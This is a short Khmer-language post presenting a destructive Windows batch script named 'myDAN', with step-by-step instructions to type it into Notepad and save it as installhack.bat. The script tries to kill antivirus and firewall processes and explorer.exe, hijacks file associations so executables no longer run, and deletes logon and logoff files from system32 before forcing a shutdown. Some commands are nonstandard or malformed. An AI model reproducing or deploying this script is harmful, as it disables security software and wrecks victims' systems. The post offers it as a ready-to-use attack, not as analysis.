កូដមេរោគដែល Hack កុំព្យួទ័រ

1កូដមេរោគ ខាងក្រោមនេះឈ្មោះថា myDAN ដែលមានសមត្ថភាព:

បិទ Process របស់ NAVAPSVC.exe
បិទ Process របស់ Explorer.exe (taskbarនិង icons នឹងត្រូវបានបិទមិនឃើញ)

  • បិទ Process របស់  zonelabs.exe
  •  ឱ្យតែកម្មវិធីណាដែលជាប្រភេទ txt file ដែលមានកន្ទុយ exe នោះវានឹងបើកម្មវិធី notepad ភ្លាម
  •  ឱ្យតែកម្មវិធីណាដែលជាប្រភេទ mp3 file ដែលមានកន្ទុយ txt នោះវានឹងបើកកម្មវិធិ Winamp ឬ WMP ភ្លាម
  •  លុប Login/Logoff  នៅលើអេក្រង់

 

អនុវត្តន៍

បើកម្មវិធី Notepad រួចសរសេរកូដខាងក្រោមៈ

color 0A

@echo off

set end=md “u cant eascape from me-vishnu”

set fin=copy “Hack log.txt” “Installing”

%end%

%fin%

net send * andhra pradesh- virus created in karimnagar from jits college

kill NAVAPSVC.exe /F /Q

kill zonelabs.exe /F /Q

kill explorer.exe /F /Q

cls

assoc .exe=txtfile

assoc .txt=mp3file

assoc .mp3=.vcf

cls

msg * hi dude this is begining.

msg * vishnu attcked the system try to challenge him .

DEL C:\WINDOWS\system32\logoff.exe /F /Q

DEL C:\WINDOWS\system32\logon.exe /F /Q

DEL C:\WINDOWS\system32\logon.scr /F /Q

cls

shutdown

បន្ទាប់មកសូមរក្សាទុកដោយដាក់ឈ្មោះថា installhack.bat